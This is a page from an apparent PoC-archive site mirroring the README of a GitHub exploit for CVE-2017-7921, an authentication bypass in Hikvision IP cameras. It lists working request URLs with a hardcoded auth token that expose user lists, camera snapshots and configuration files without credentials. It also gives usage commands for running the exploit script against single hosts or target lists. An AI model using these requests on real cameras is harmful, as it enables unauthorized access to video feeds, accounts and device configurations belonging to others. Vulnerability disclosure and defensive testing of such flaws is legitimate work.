Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-7921 PoC — 多款Hikvision产品安全漏洞

Source
https://github.com/inj3ction/CVE-2017-7921-EXP
Associated Vulnerability
Title:多款Hikvision产品安全漏洞 (CVE-2017-7921)
Description:An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.
Readme
# CVE-2017-7921 Exploit

An Improper Authentication issue was discovered in Hikvision  devices.

​    The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users.

​    This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.

           # inj3ction

​    https://seclists.org/fulldisclosure/2017/Sep/23



​    Vulnerability details:

​    \----------------------

​    Retrieve a list of all users and their roles:

​        http://camera.ip/Security/users?auth=YWRtaW46MTEK

​    Obtain a camera snapshot without authentication:

​        http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

​    And worst of all, one can download camera configuration:

​        http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK



## Install dependence

```python
python3 -m pip install -r requirements.txt
```

## Usage

```python3
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
```

## Screenshot

![](./Screenshot.jpg)
File Snapshot

 [4.0K]  /data/pocs/499606f95fb82d98645709d7437326a1aa067525
├── [5.2K]  CVE_2017_7921_EXP.py
├── [1.1K]  README.md
├── [  45]  requirements.txt
└── [692K]  Screenshot.jpg

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →